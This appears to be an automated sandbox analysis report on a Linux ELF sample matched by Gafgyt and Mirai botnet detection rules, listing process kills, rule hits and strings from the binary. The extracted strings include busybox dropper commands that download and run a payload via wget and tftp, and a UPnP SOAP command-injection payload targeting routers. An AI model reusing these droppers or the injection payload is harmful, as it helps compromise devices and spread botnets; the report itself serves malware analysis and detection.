        Source: Process Memory Space: rLMjh4RBTM.elf PID: 6024, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Process Memory Space: rLMjh4RBTM.elf PID: 6027, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Source: Process Memory Space: rLMjh4RBTM.elf PID: 6086, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
        Contains symbols with names commonly found in malware
        Source: ELF static info symbol of initial sampleName: attackpids
        Source: ELF static info symbol of initial sampleName: tcp_attack
        Source: ELF static info symbol of initial sampleName: udp_attack
        Sample tries to kill multiple processes (SIGKILL)
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 795, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 800, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 803, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1364, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1369, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1371, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1383, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1394, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1560, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1564, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1567, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1577, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1588, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1593, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1610, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1630, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1633, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1635, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1638, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1639, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1640, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1642, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1647, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1650, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1653, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1655, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1659, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1661, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1683, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1712, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1717, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 2946, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 2997, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 2999, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3120, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3129, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3142, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3147, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3184, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3187, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3188, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3189, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3190, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3193, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3207, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3215, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3235, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3245, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3246, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3268, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3304, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3319, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3329, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3341, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3353, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3361, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3392, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3398, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3402, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3406, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3412, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3425, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3689, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5514, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5519, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5521, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5524, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5525, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5544, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5567, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5568, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5569, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5571, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5572, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5573, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5574, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5594, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5595, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5596, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5601, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5602, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5603, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5604, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5607, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5613, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5654, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5702, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5765, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5829, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5871, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5911, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5958, result: successfulJump to behavior
        Source: rLMjh4RBTM.elfELF static info symbol of initial sample: passwords
        Source: rLMjh4RBTM.elfELF static info symbol of initial sample: payloads
        Source: rLMjh4RBTM.elfELF static info symbol of initial sample: scanner_init
        Source: rLMjh4RBTM.elfELF static info symbol of initial sample: usernames
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: /bin/busybox HBOT
        Source: Initial sampleString containing 'busybox' found: 2surf2vhoi2h{h2surf2/proc//exe//fd/socketprocselfmil/lib//usr/bin//usr/sbin/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdusr/shellmnt/sys/boot/media/srv/var/run/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshdbashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/mipsel.nnmips.nnarm.nnarm5.nnarm6.nnarm7.nnx86_32.nnwget/.curlhttparmmipsanko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverUnable To Connect to Target: %s:%d
        Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /proc/cpuinfo
        Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/busybox
        Source: Initial sampleString containing 'busybox' found: /bin/busybox cp /bin/busybox .hbot && >.hbot && /bin/busybox chmod 777 .hbot && /bin/busybox cp /bin/busybox .dropper && >.dropper && /bin/busybox chmod 777 .dropper
        Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -r %s -g %s; /bin/busybox chmod +x %s; ./%s
        Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://%s/%s -O -> hbot; /bin/busybox chmod +x hbot; ./hbot %s
        Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .dropper; ./.dropper
        Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -en '%s' %s .dropper; %s ; /bin/busybox echo -en '\x42\x41\x50\x45'
        Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .hbot; ./.hbot %s; /bin/busybox HDROP
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s -l /tmp/hakai -r /mips; /bin/busybox chmod 777 * /tmp/hakai; /tmp/hakai mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: Initial sampleString containing 'busybox' found: EL[tel] login attempt [%s:23 %s:%s]/bin/busybox cat /proc/cpuinfo
        Source: Initial sampleString containing 'busybox' found: [tel] detected arm7 [%s:23 %s:%s][tel] detected arm4 [%s:23 %s:%s]/bin/busybox cat /bin/busybox
        Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .dropper; ./.dropper/bin/busybox echo -en '%s' %s .dropper; %s ; /bin/busybox echo -en '\x42\x41\x50\x45'
        Source: Initial sampleString containing 'busybox' found: [tel:echo] line [%d] dropped [%s:23 %s:%s %s][tel] [%s:23 %s:%s] [%s] echo complete, executing dropper and binary/bin/busybox chmod +x .hbot; ./.hbot %s; /bin/busybox HDROP
        Source: Initial samplePotential command found: GET /arm HTTP/1.0
        Source: Initial samplePotential command found: GET /arm7 HTTP/1.0
        Source: Initial samplePotential command found: GET /mips HTTP/1.0
        Source: Initial samplePotential command found: GET /mpsl HTTP/1.0
        Source: Initial samplePotential command found: GET /sh4 HTTP/1.0
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 795, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 800, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 803, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1364, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1369, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1371, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1383, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1394, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1560, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1564, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1567, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1577, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1588, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1593, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1610, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1630, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1633, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1635, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1638, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1639, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1640, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1642, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1647, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1650, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1653, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1655, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1659, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1661, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1683, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1712, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 1717, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 2946, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 2997, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 2999, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3120, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3129, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3142, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3147, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3184, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3187, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3188, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3189, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3190, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3193, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3207, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3215, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3235, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3245, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3246, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3268, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3304, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3319, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3329, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3341, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3353, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3361, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3392, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3398, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3402, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3406, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3412, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3425, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 3689, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5514, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5519, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5521, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5524, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5525, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5544, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5567, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5568, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5569, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5571, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5572, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5573, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5574, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5594, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5595, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5596, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5601, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5602, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5603, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5604, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5607, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5613, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5654, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5702, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5765, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5829, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5871, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5911, result: successfulJump to behavior
        Source: /tmp/rLMjh4RBTM.elf (PID: 5491)SIGKILL sent: pid: 5958, result: successfulJump to behavior
        Source: rLMjh4RBTM.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: rLMjh4RBTM.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
        Source: rLMjh4RBTM.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
        Source: 5610.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: 5610.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
        Source: 5610.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa48b592 reference_sample = c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88, id = fa48b592-8d80-45af-a3e4-232695b8f5dd, last_modified = 2021-09-16
        Source: 5570.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
        Source: 5570.1.0000000008048000.0000000008057000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_122ff2e6 reference_sample = c7dd999a033fa3edc1936785b87cd69ce2f5cac5a084ddfaf527a1094e718bc4, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3c9ffd7537e30a21eefa6c174f801264b92a85a1bc73e34e6dc9e29f84658348, id = 122ff2e6-56e6-4aa8-a3ec-c19d31eb1f80, last_modified = 2021-09-16
